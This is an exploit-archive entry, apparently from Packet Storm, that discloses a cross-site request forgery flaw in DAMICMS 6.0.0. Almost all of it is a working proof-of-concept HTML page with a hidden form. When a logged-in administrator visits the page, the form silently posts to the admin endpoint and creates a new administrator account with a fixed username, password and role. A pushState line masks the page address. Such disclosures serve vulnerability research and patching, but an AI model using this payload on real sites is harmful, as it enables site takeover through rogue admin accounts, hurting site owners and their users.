DAMICMS 6.0.0 Cross Site Request Forgery

2018-07-02T00:00:00
ID PACKETSTORM:148385
Type packetstorm
Reporter bay0net
Modified 2018-07-02T00:00:00

Description

                                        
                                            `<!--  
# Exploit Title: DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)  
# Date: 2018-06-30  
# Exploit Author: bay0net  
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9248562.html  
# Software Link: https://www.damicms.com/Down#  
# Version: DAMICMS_V6.0.0  
# CVE : N/A  
  
# DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.  
# The payload for attack is as follows.  
-->  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://Target/dami/admin.php?s=/Admin/doadd" method="POST">  
<input type="hidden" name="username" value="test22" />  
<input type="hidden" name="password" value="test22" />  
<input type="hidden" name="role_id" value="1" />  
<input type="hidden" name="Submit" value="ae*>>a " />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
  
`